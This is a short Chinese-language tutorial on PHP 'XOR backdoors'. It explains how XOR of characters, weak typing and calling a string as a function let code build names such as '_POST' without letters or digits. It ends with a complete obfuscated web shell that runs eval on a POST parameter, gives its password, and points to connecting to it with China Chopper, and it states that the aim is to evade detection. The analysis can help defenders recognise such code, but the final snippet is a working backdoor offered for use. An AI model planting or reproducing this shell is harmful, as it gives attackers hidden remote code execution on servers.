php后門－－異或

   看這個：

<?php  

echo "A"^"}";

?>

   運行這段代碼，那么輸出的結果是字符"<",之所以會得到這樣的結果，是因為代碼中對字符"A"和字符"}"進行了異或操作。在PHP中，兩個變量進行異或時，會將字符串轉換成二進制再進行異或，異或完，又將結果從二進制轉換成了字符串。異或操作有時也被用來交換兩個變量的值。

   我們都知道，PHP是弱類型的語言，也就是說在PHP中我們可以不預先聲明變量的類型，而直接聲明一個變量并進行初始化或賦值操作。正是由于PHP弱類型的這個特點，我們對PHP的變類型進行隱式的轉換，并利用這個特點進行一些非常規的操作。如將整型轉換成字符串型，將布爾型當作整型，或者將字符串當作函數來處理，下面我們來看一段代碼：

<?php  

$_++;  

$__="<"^"}";  

$__("stuff");

?>

看到這段代碼，大家或許會覺得很疑惑，下面我簡單的來解釋一下：

 (1)$_++;這行代碼的意思是對變量名為"_"的變量進行自增操作，在PHP中未定義的變量默認值為null,null==false==0,我們可以在不使用任何數字的情況下,通過對未定義變量的自增操作來得到一個數字。

 (2)$__="<"^"}";對字符"<"和"}"進行異或運算，得到結果A賦給變量名為"__"(兩個下劃線)的變量

 (3)$__("stuff");通過上面的賦值操作,變量$__的值為A，所以這行可以看作是A("stuff"),在PHP中,這行代碼表示調用函數A,但是由于程序中并未定義函數A，所以這行代碼會拋出一個致命錯誤使程序停止運行。這行代碼沒什么實際的意義，但是它能簡單體現出在PHP中，我們可以將字符串當作函數來處理。

 文章進行到這里，大家如果再看到類似的PHP后門應該不會那么迷惑了，你可以通過一句句的分析后門代碼來理解后門想實現的功能。如果你依然迷惑，那說明本菜鳥的文章寫的不好，先說聲抱歉了，但是還是希望你別罵我。

 上面的那段示例代碼最后會出錯，導致程序停止運行，當然寫出一個出錯的程序并不是我們的目的，使用這種后門的主要目的是創建一些可以繞過檢測的并且對我們有用的字符串，如_POST", "system", "call_user_func_array"，或者是任何我們需要的東西。

 下面是個非常簡單的非數字字母的PHP后門：

@$_++; // $_ = 1
$__=("#"^"|"); // $__ = _
$__.=("."^"~"); // _P
$__.=("/"^"`"); // _PO
$__.=("|"^"/"); // _POS
$__.=("{"^"/"); // _POST
@eval(${$__}[!$_]);//mima:0

   上菜刀把。